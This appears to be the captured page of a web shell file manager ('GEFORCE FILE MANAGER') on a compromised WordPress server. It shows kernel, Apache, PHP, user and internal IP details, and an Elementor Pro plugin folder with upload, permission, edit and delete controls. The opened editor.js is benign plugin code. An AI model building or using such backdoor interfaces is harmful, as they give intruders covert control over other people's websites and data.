[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor-pro
/
core
/
app
/
modules
/
site-editor
/
assets
/
js
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 atoms
SET
[ DEL ]
📁 context
SET
[ DEL ]
📁 data
SET
[ DEL ]
📁 hooks
SET
[ DEL ]
📁 molecules
SET
[ DEL ]
📁 organisms
SET
[ DEL ]
📁 pages
SET
[ DEL ]
📁 part-actions
SET
[ DEL ]
📄 editor.js
426 B
SET
[ EDIT ]
|
[ DEL ]
📄 site-editor.js
3,171 B
SET
[ EDIT ]
|
[ DEL ]
📄 site-editor.scss
454 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: editor.js
import Component from './data/component'; import { Templates } from './data/commands'; export default class Module extends elementorModules.editor.utils.Module { onElementorInit() { const config = elementor.documents.getCurrent().config; if ( config.support_site_editor ) { $e.components.register( new Component() ); $e.data.deleteCache( $e.components.get( Component.namespace ), Templates.signature ); } } }